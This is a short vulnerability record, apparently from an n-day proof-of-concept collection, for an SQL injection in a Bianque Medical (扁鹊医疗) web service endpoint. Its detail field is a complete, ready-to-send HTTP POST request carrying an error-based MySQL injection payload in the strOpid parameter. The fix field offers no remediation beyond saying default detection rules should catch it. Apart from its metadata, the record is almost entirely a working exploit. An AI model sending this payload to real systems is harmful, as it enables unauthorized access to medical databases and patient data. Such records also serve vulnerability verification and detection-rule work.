vendor = "扁鹊医疗"
name = "扁鹊医疗GetLyfsByParams sql注入"
type = "SQL注入"
version = "未知"
path = "/AppService/BQMedical/WebServiceForFirstaidApp.asmx/GetLyfsByParams"
detail = "POST /AppService/BQMedical/WebServiceForFirstaidApp.asmx/GetLyfsByParams HTTP/1.1 Host: Accept: */* Accept-Encoding: gzip, deflate, br, zstd Connection: keep-alive Content-Length: 198 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.0 (KHTML, like Gecko) Chrome/24.0.809.0 Safari/534.0 strOpid=1 AND (SELECT 9054 FROM(SELECT COUNT(*),CONCAT(0x7b7e7b,(SELECT (ELT(9054=9054,1))),md5(123456),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&strTempID=1&strNumber=&strUnit="
fix = "缺省规则可检出，除非设备规则太烂"
date = "0703"
label = "nday"
verifier = "AdySec"
